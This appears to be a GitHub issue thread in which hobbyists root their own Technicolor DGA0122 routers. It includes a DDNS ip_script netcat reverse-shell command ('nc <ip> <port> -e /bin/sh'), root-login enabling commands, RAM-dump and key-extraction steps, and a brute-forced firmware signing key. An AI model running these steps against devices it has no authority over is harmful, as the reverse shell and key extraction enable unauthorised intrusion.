Support for Technicolor DGA0122 (VCNT-P) in UK

[EXPECT-SYMBOLS]

General info

My gateway is currently running firmware version 19.4 in UK.

• Product: DGA0122nlk
• Countries: UK
• Commercial name from the ISP: None known.
• Board: (VCNT-P)

Did anybody ever manage to get root on that device already?

Select all applicable

• [ ] Yes, by using a root strategy listed in the wiki
• [x] Yes, following another different strategy
• [ ] No, as far as I know it has never been rooted

Say something more about the adopted strategy here

Mainly raising this issue to share the root strategy - not very interested in firmware flashing. The Ping and DDNS web interface validation holes seem to be closed on this version. Using the engineer logon by SSH to change the WPS button handler is blocked now. I had a look at AutoFlashGUI but this model is not explicitly supported (unsure if the below is the same DDNS exploit it uses, or a different one). With engineer SSH access, the following approach works:

• start a netcat listener on your LAN
• logon to the router by SSH as engineer using the admin password from the sticker on the bottom of the router
• change the DDNS client to obtain its IP address from a script instead of from the network:
  • set uci.ddns.service.@myddns_ipv4.ip_source script
• set the script to be the netcat reverse shell, including full path to netcat:
  • set uci.ddns.service.@myddns_ipv4.ip_script '/usr/bin/nc <ip> <port> -e /bin/sh'
• Login to the router's web interface, go to WAN Services -> DynDNS tab
  • In the IPv4 section, click the enable button.

If it works, a reverse shell connects in a few seconds.

Standard instructions for enabling root logon work, except note that root's default shell is now /bin/restricted_shell instead of /bin/false so the sed command has to reflect that, e.g.

sed -i "1s/\/bin\/restricted_shell/\/bin\/ash/" /etc/passwd
uci set dropbear.lan.RootLogin='1'
uci set dropbear.lan.RootPasswordAuth='on'
uci commit
/etc/init.d/dropbear restart

Firmware versions

Please fill as many available info about each firmware versions you have ever heard about for this board. Leave unknown parts empty.

• Version: 19.4.0207
• Full version: 19.4.0207-4381030-20201028185645
• Custom firmware version strings used by ISP in addition to the above: unknown
• RBI file name: no RBI known
• RBI official download URL: no download link known, I have the ISP's server location but no success guessing a download link name
  • [ ] The link is restricted to ISP users or requires download password
• Other RBI download links for us to look into it: none known
• Raw bank dump download link: none known, and unwilling to install rom dump / cracking tools on my working router any time soon
• Serial console bootlog: no serial console access; will a dmesg log help?
• Other potentially relevant info about this firmware version:

repeat the same above block of info for each known version you heard about

Other details

everything else you already discovered or tried for this device and other details like how this usually receives firmware upgrades and if you know something more about this

/proc/cpuinfo shows 3 processors, ARMv7 Processor rev 5 (v7l)

/proc/meminfo shows 256MB RAM

Storage looks like:

# df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/root                23.3M     23.3M         0 100% /rom
tmpfs                   122.2M    340.0K    121.9M   0% /tmp
/dev/mtdblock2           20.0M      2.9M     17.1M  14% /overlay
overlayfs:/overlay       20.0M      2.9M     17.1M  14% /
tmpfs                   512.0K         0    512.0K   0% /dev

DSL chipset:

# xdslctl info --vendor
ChipSet Vendor Id:      BDCM:0xa188
ChipSet VersionNumber:  0xa188
ChipSet SerialNumber:

OpenWRT version:

# cat /etc/openwrt_release
DISTRIB_ID='OpenWrt'
DISTRIB_RELEASE='SNAPSHOT'
DISTRIB_REVISION='r13028-8f3e65d75d'
DISTRIB_TARGET='brcm6xxx-tch/VCNTJ_502L07'
DISTRIB_ARCH='arm_cortex-a7'
DISTRIB_DESCRIPTION='OpenWrt SNAPSHOT r13028-8f3e65d75d'
DISTRIB_TAINTS='no-all glibc busybox'

[LuKePicci]

Hi! Thanks for sharing this, Who is the ISP?

I had a look at AutoFlashGUI but this model is not explicitly supported

All specific profiles in AFG are basically deprecated, the three Generic works basically anywhere if the exploit hole is still there. I'm quite sure they're not there anymore in 19.x firmwares.

unsure if the below is the same DDNS exploit it uses, or a different one

It's a different one. AFG implements webui exploits only. Yours is more like a variant of the clash escaping #D strategy, and I would probably extend it to newer firmwares following your idea rather than defining a different strategy. It's still clash escaping after all (restricted_shell is a wrapper for clash). This strategy is viable whenever the default engineer account is available.

except note that root's default shell is now /bin/restricted_shell instead of /bin/false so the sed command has to reflect that

Please let me know where you have seen that old sed command so I can update it. We have replaced it almost everywhere with a generic version of that same command (also in #D strategy instructions) which should work as well: sed -i 's#/root:.*$#/root:/bin/ash#

• unwilling to install rom dump / cracking tools on my working router any time soon

No RAM dump is needed, it is enough to copy mtd dumps to an USB drive. We need mtd3/mtd4 dumps (firmware banks, share them) and OSCK/OSIK keys you can extract from inside mtd5 dump (eripv2, share OSCK/OSIK only) using some tools on your PC

• For the mtd dumps you don't need to install anything on the router.
• For mtd5 keys extraction you also need your ECKey which gets printed in dmesg as soon as you insmod the r2secr.ko module. You don't need to install this module, copy it on the USB drive and load it once from there, There is probably no module compiled for your exact kernel version in the r2secr repo, the existing 4.1(.38) arm version you see in there needs vermagic to be patched in order to load (unfortunately the modprobe command from busybox has no --force-vermagic option). To read the correct vermagic string you need to try loading the existing 4.1 arm module, dmesg will print out a message indicating unsuccessful loading because of vermagic mismatch and also tell you the correct one.

[theCrius]

Just to post a somewhat relevant information. I tried this procedure on a Technicolor DWA0120, provided by SSE in UK, and it doesn't work.

The reverse console simply never shows up because the script is never triggered.

Full details of my router:

[LuKePicci]

According to https://github.com/FrancYescO/tch_firmware_extracted/blob/ad9a5c310b746ac82d1e5bbbc62866bf265fc4bb/usr/lib/ddns/dynamic_dns_functions.sh#L659 it turns out ip_network and ip_interface options must be unset in order for the ip_script to be evaluated. I guess VCNT-P defaults do match the above requirement already. It is also possible that a previous ddns setup applied via web interface filled in one of them making the unset commands necessary.

[theCrius]

I'll try this again in the next couple days 👍

Edit: Couple days became couple of weeks I know. Editing just to say I've not forgotten about this. I'll try and go on with the tests as soon as I can.

[dmsolutionz]

The reverse shell method works a treat 👍 any other progress? I could help, I have a device on me thats not in use.

[LuKePicci]

Sure you can, we need to extract the remaining info to properly push a support commit to the wiki. There is a post of mine here above, try to find and share them. If you need quick help on this find me on Telegram.

[NeutralKaon]

One of my family members has just been sent a Technicolor DGA0122 by Andrews & Arnolds (an excellent, nerd-friendly UK ISP). I'm very interested in seeing how this turns out, and if it ends up being possible to put open-wrt and Luci on it. Thanks all here for working on it.

[LuKePicci]

Support for DGA0122 is in stadby waiting for help from someone who follows the same strategy described by the OP on his DGA0122 and shares firmware and OSCK.

[HumanEquivalentUnit]

I have done this on one from Andrews & Arnold, the script did not trigger first time, but I have got it to work.

Seems it gets stuck trying to lookup the current IP of the default value yourhost.example.com and fails. In the web interface, set the Dynamic DNS settings to have a real domain instead, and leave fake username and password in there. I did clear the ip_network and ip_interface from engineer SSH login while testing, not sure if that helped or not.

Working web interface settings:

Working Windows desktop settings for the reverse shell:

• Admin command prompt.
• netsh firewall set opmode disable to disable Windows firewall.
• ncat --verbose --listen 192.168.1.180 9000 (desktop IP, unused port, matching what the DDNS script will connect to) using ncat.exe binary installed from NMap for Windows.

---

Background findings, in case the commands or log messages are useful to anyone else reading:

From the engineer SSH login logread showed these errors:

user.err ddns-scripts[2165]: myddns_ipv4: BusyBox nslookup error: 1
user.warn ddns-scripts[2165]: myddns_ipv4: Get registered/public IP for yourhost.example.com failed - retry 4/0 in 60 seconds

That's the default domain which appears in the web DynDNS interface, looks like it's trying to nslookup it:

I tried clearing all settings from the web interface, doesn't like that either:

user.warn ddns-scripts[8148]: myddns_ipv4: Service section not configured correctly! Missing lookup_host - TERMINATE

Tried setting the domain to www.example.com (which is a real domain / address) and clearing username/password, still no:

user.warn ddns-scripts[9987]: myddns_ipv4: Service section not configured correctly! Missing username - TERMINATE
user.warn ddns-scripts[9987]: myddns_ipv4: PID 9987 exit WITH ERROR 1 at 2021-11-21 16:52

Putting fake creds in gets past this and it runs and reverse shell worked.

root password defaults to root after that.

[LuKePicci]

Great. Yeah, clearing those two values is necessary in case they have got set, otherwise ddns-scripts doesn't use the script method. I use 'localhist' as domain when this strategy is needed.

Could you go further and share OSCK and firmware?

[HumanEquivalentUnit]

Could you go further and share OSCK and firmware?

I've done dd if=/dev/mtd3... (50MB dump), dd if=/dev/mtd4 ... (50MB dump) and dd if=/dev/mtd5 .. (128Kb dump), I will find somewhere to upload them. Your earlier comment about the r2secr module not loading is correct, dmesg prints:

[10264.213374] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10307.082621] lime: version magic '4.1.52 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10438.115452] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10583.253624] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10585.282770] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10588.022271] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '
[10624.592217] r2secr: version magic '4.1.38 SMP preempt mod_unload ARMv7 ' should be '4.1.52 SMP preempt mod_unload ARMv7 p2v8 '

I'm not familiar with vermagic, but after searching I downloaded from https://github.com/fanfuqiang/vc and compiled, tried to put the "should be" string into it and it says "Length of the new specified vermagic overflow". I tried chopping off the "p2v8" from the end, and it runs without errors but does not update the module:

# copy to new version
user@s1:~/vermagic$ cp r2secr.arm.4.1.38.ko r2secr.arm.4.1.52.ko

# check current vermagic
user@s1:~/vermagic$ ./vc -v r2secr.arm.4.1.52.ko
Module name:                            r2secr.arm.4.1.52.ko
Section name:                           .modinfo
[001] license=GPL
[002] depends=
[003] vermagic=4.1.38 SMP preempt mod_unload ARMv7
[004]

# set new one, no errors
user@s1:~/vermagic$ ./vc -v +"4.1.52 SMP preempt mod_unload ARMv7" r2secr.arm.4.1.52.ko
Module name:                            r2secr.arm.4.1.52.ko
Section name:                           .modinfo
{-}Old value => vermagic=4.1.38 SMP preempt mod_unload ARMv7
{+}New value => vermagic=4.1.52 SMP preempt mod_unload ARMv7

# recheck, vermagic has not changed
user@s1:~/vermagic$ ./vc -v r2secr.arm.4.1.52.ko
Module name:                            r2secr.arm.4.1.52.ko
Section name:                           .modinfo
[001] license=GPL
[002] depends=
[003] vermagic=4.1.38 SMP preempt mod_unload ARMv7
[004]

Any suggestions where to go from here?

[LuKePicci]

I have pushed a commit to secr repo https://github.com/pedro-n-rocha/secr last week which includes a lime module for the p2v8

I had to compile the same non-p2v8 with a longer vermagic in order to be able to patch it without the overflowing command.

[HumanEquivalentUnit]

The LIME module works to make a memory dump; that page says "You need to search for your ECKey into the full RAM dump made with LiME" but how?

[LuKePicci]

It's easier to send me both the memory dump and the mtd5 partition dump.

Briefly, I will inspect the memdump for known ripdrv memory regions and try using some probable offsets as ECKey. The eripv2.py script, when used onto your mtd5 dump and with candidate ECKey from your RAM dump, will tell us if the candidate ECKey is corect or not. If it's not I'll retry another one, and so on.

Once found, I'll tell you your ECKey, so you could search for it into your RAM dump and see yourself what I mean with "known ripdrv memory regions",

[HumanEquivalentUnit]

That makes me uncomfortable; a memory dump likely contains enough router state to include:

• WiFi SSID and MAC, enough for https://wigle.net/ to find my home
• NAT tables, DNS cache, firewall state enough to find my work
• PPPoA login details, enough to mess with my ADSL connection
• filesystem cache, bits of traffic from all people and devices connected to it

If you can give hints for probable locations, I am willing to try eripv2.py on lots of possibles, or if there's any link to setting up a crosscompiler, I might be able to.

[LuKePicci]

Alright. You basically have to find the "ripdrv" string (highlighted in blue below) all over the ram dump. One of its occurrences will have a following bytes layout similar to this one:

Your ECKey should be on the bottom (highlighted in green) shortly/immediately before the 00 pattern resumes. If you can't find its exact location just start trying every 128 bit byte sequence after the "ripdrv" string, you can skip those with all/a lot of zeroes. If you have troubles you could also send me small parts of the ram dump near the ripdrv occurrences.

[HumanEquivalentUnit]

Hi, I want to try that, but the picture is too blurry for me to read the hex values or text - could you paste a higher res one please?

[LuKePicci]

Unfortunately this was a screen from an old chat with another guy I helped and I couldn't get an higher res for it but I can take a new one from another device dump.

Anyway the blue highlight on the top is the ascii string "ripdrv", the yellow bytes are all 00, the last part contains keys so it's basically made of random bytes.

If you search for "ripdrv" equivalent hex ascii bytes you will find a relatively small number of matches. Only one or two of them will have that big yellow pattern of zeroes. The most of other occurrencies of "ripdrv" will be in module filenames (ripdrv.ko) and you can exclude them.

[protonbeam]

One of my family members has just been sent a Technicolor DGA0122 by Andrews & Arnolds (an excellent, nerd-friendly UK ISP). I'm very interested in seeing how this turns out, and if it ends up being possible to put open-wrt and Luci on it. Thanks all here for working on it.

If your family member is still with Andrews & Arnolds is it possible to ask for a copy of the RBI file for Technicolor DGA0122 & Technicolor DGA0120 as Technicolor seem to be really unhelpful in this? Thanks

[antnks]

I own this one (Telia Lithuania):

Product Name: Telia X1
Software Version: 19.4
Firmware Version: 19.4.0539-4521016-20210305170329
Hardware Version: VCNT-P

None strategies worked. Samba patched, remote management uses TLS (https://rgw.teliacompany.com:7575/), engineer shell either turned off or hidden by firewall rule (and remote IP is unknown).

If you want me to check anything - welcome

[tosiara]

Ok, I have got root on a VCNT-P device. Tried to insmod lime.arm.4.1.52_p2v8.ko but dmesg is empty

[LuKePicci]

Cool! Lime requires some arguments on the insmod command line to tell where to save the ram dump. Make sure you give it a path with enough space (maybe an USB flashdrive).

[tosiara]

Could you provide me the full command for lime please?

[tosiara]

Ah, I found it. Will execute now insmod lime.arm.3.4.11-rt19.ko "path="/tmp/run/mountd/sda1/ram.dump" format=raw"

[tosiara]

Got the dump, but can't find any "ripdrv" strings there

[tosiara]

Would that info help to find the key?

Kernel command line: console=ttyAMA0 earlyprintk debug irqaffinity=0 cma=0M isolcpus=2 
rootfs_offset=0x01400000 tbbt_addr=0x7d20000 btab=0x12100c btab_bootid=2 bl_version=19.48.1277-0000000-20191129105551-100cf3779d32d452d044730de116d1cf7969a5f8 
board=VCNT-P platform.prozone_addr=0xffe0000 bl_oid=5de0f78e4f5d980688c37ea3 .r2secr=0xffdf000

[LuKePicci]

Yup, but I also need to look into the ram dump and the mtd5 partition dump. Please share it to me or contact me back on telegram this weekebd if you need to try your own.

[tosiara]

Yes, I could send you my memory dump. Do you have a PGP key?

[tosiara]

Nevermind, I managed to brute force it :D

[tosiara]

Could anyone else try this key:

[LuKePicci]

Is this ECK? If yes it is only valid for your mtd5. Inside your mtd5 you will find OSCK which is useful to everybody. To test the OSCK you need an RBI to decrypt for VCNT-P

[tosiara]

This one is OSCK?

26c2
RIP_ID_OSCK EIK_SIGNED and ECK_ENCR
SIG: OK (proves provided ECK is correct)
dumping to file  18_RIP_ID_OSCK_0x0121-67bb13be ....
00000000: 92 4E 3D 4E 2C 45 6E 02  C2 48 85 4F CA 15 C6 84  .N=N,En..H.O....
00000010: 1A 40 67 31 E3 D7 E9 61  A3 B9 6A 8B 61 A8 66 77  .@g1...a..j.a.fw

[tosiara]

I don't have a firmware yet. So maybe someone else could try to decrypt RBI with that key?

[LuKePicci]

Yes that's the OSCK. I think nobody has this RBI firmware so far as often happens with unbranded firmwares like these used in UK by Netlynk partners. In some cases the ISP can give you the firmware if you are still a customer.

[tosiara]

Yes, I can confirm the OSCK is good:

# binwalk -e DGA0122-VCNT-P-19.4.0539-4521016-Signed.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
38            0x26            LZMA compressed data, properties: 0x6D, dictionary size: 4194304 bytes, uncompressed size: 6457120 bytes
20971520      0x1400000       Squashfs filesystem, little endian, version 4.0, compression:xz, size: 25882772 bytes, 7325 inodes, blocksize: 262144 bytes, created: 2021-03-05 16:03:53
46923916      0x2CC008C       device tree image (dtb)

[LuKePicci]

Great! Could you take care of opening a PR for wiki entry with firmware links?

[tosiara]

Sure, will do that. How do I share the firmware and mtd dump files?

[LuKePicci]

We usually avoid storing RBI files here on the repo, we only store raw dumps of firmware for which we have no corresponding RBI.

The repo contains links to original ISP download location(s) if they host these file on a server, even if that server is restricted by secret credentials or firewall of any kind. We need these links to allow other people who has such credentials to retrieve a copy of the file from its authentic source.

Additionally, we create a torrent file having such link as a web seed in order to hard-couple the torrent to the original file. The torrent file is included in this repo and can be reseeded when needed.

[LuKePicci]

The dumps are not needed, keep it safe for you. The OSCK is included in the folder on this repo (binary file as you get it in the folder where eripv2.py run.

[protonbeam]

We usually avoid storing RBI files here on the repo, we only store raw dumps of firmware for which we have no corresponding RBI.

The repo contains links to original ISP download location(s) if they host these file on a server, even if that server is restricted by secret credentials or firewall of any kind. We need these links to allow other people who has such credentials to retrieve a copy of the file from its authentic source.

Additionally, we create a torrent file having such link as a web seed in order to hard-couple the torrent to the original file. The torrent file is included in this repo and can be reseeded when needed.

Has someone found a RBI for Technicolor DGA0122? If so is it possible to ask how to get a copy? Thanks

[tosiara]

@protonbeam I only got this one from Telia Lithuania: https://www.dropbox.com/s/gukgtjcfyufstn0/DGA0122-VCNT-P-19.4.0539-4521016-Signed.rbi.zip?dl=0

Didn't have much time to go through it, but so far it looks quite locked. If you flash it, probably, you won't be able to get root there.

[tosiara]

@HumanEquivalentUnit You can try to search for i=bcm963xx_fs_kernel string in the dump (there will many of them) and the key should be somewhere near, in the following offsets:

marker	Run 1	Run 2	Run 3	Run 4
i=bcm963xx_fs_kernel	00f4ddc8	00f4ddc8	not found	00f4ddc8
first key occurrence	00f62e38	00f62e38	not found	00f62e38
second key occurrence	023e5e38

snip

[protonbeam]

@protonbeam I only got this one from Telia Lithuania: https://www.dropbox.com/s/gukgtjcfyufstn0/DGA0122-VCNT-P-19.4.0539-4521016-Signed.rbi.zip?dl=0

Didn't have much time to go through it, but so far it looks quite locked. If you flash it, probably, you won't be able to get root there.

Thanks I will have a look over the weekend

[protonbeam]

@protonbeam I only got this one from Telia Lithuania: https://www.dropbox.com/s/gukgtjcfyufstn0/DGA0122-VCNT-P-19.4.0539-4521016-Signed.rbi.zip?dl=0

Didn't have much time to go through it, but so far it looks quite locked. If you flash it, probably, you won't be able to get root there.

Do you or anyone else know if anyone has tried to flash this using BOOTP flashing or know what this router is doing and what I need to do to get it into the right mode https://user-images.githubusercontent.com/100783100/156420019-f2deff13-587f-47d6-b7b2-521f5784f5da.mp4 as I can't seem to get it to find the tftp server https://hack-technicolor.readthedocs.io/en/stable/Recovery/#set-up-tftp (does the default ip address 192.168.1.1 written on the router have any significance vs 10.0.0.100 or 10.0.0.99 used in this guide?)

Does anyone know what the router does if it doesn't like a rbi file? Would if show up in the tftp server log file?

Thanks

[LuKePicci]

The ip address for tftp is decided by the tftp server application, doesn't matter which one you choose as long as it is valid.

[protonbeam]

Has anyone managed to force a DGA0122 into BOOTP mode by using the reset button when booting? If yes how long do you need to hold it in for?

Thanks

[LuKePicci]

Just power it up while reset button is pressed and wait until some LEDs start flashing differently then usual. If you keep an ethernet cable connected to your PC and any LAN port you will see the ethernet activity Led blinking at a fixed pace.

[protonbeam]

Just power it up while reset button is pressed and wait until some LEDs start flashing differently then usual. If you keep an ethernet cable connected to your PC and any LAN port you will see the ethernet activity Led blinking at a fixed pace.

That doesn't seem to be working & as what happen (tch-nginx-gui) seem to seem to be silmiar to this blog post - https://rigacci.org/wiki/doku.php/doc/appunti/hardware/technicolor_tg789vac_v2 I'm wondering if flashing a new firmare via TFTP may not work so I whated so see if anyone has connected to this router via serial console?

If so what Serial Adapter did you use (I know it needs to be 3.3 volts) i was thinking something like this https://www.ebay.co.uk/itm/255334095435?hash=item3b73191a4b:g:dyIAAOSwW0lh41E2&var=555310326802 & the instructions are similar to other technicolor routers https://whirlpool.net.au/wiki/hack_technicolor_advanced#:~:text=still%20using%20them!-,Serial%20Console,-A%20serial%20console

Thanks

[LuKePicci]

Sorry for the late reply, when BOOTP is refusing a new image it could be it is signed by a different OSIK/OSCK despite having same board name. Either you check the serial console while flashing with bootp or you could run signature check on the RBI from @tosiara using both Telia and Technicolor OSIKs from this repo. I guess your VCNT-P is non-telia and is using Technicolor OSIK, whilte the RBI is signed for Telia's OSIK.

[protonbeam]

No worries thanks for your reply. No my Technicolor DGA0122 (VCNT-P) is not Telia it a UK ISP I bought it off ebay as I needed a router with Voip ports (but those only seem to work when connected via the WAN port which was irritating as I was also using it as a wired range extender so it would connect to the rest of my home network directly) & it had a bug where my mobile phone would not connect to the wifi.

But I'm interested to see what the full capabilities of this router are if there was a decent firmware for it.

Do you know of a guide for wiring up a Serial Adapter on this model or are the instructions similar to other technicolor routers? https://whirlpool.net.au/wiki/hack_technicolor_advanced#:~:text=still%20using%20them!-,Serial%20Console,-A%20serial%20console

Thanks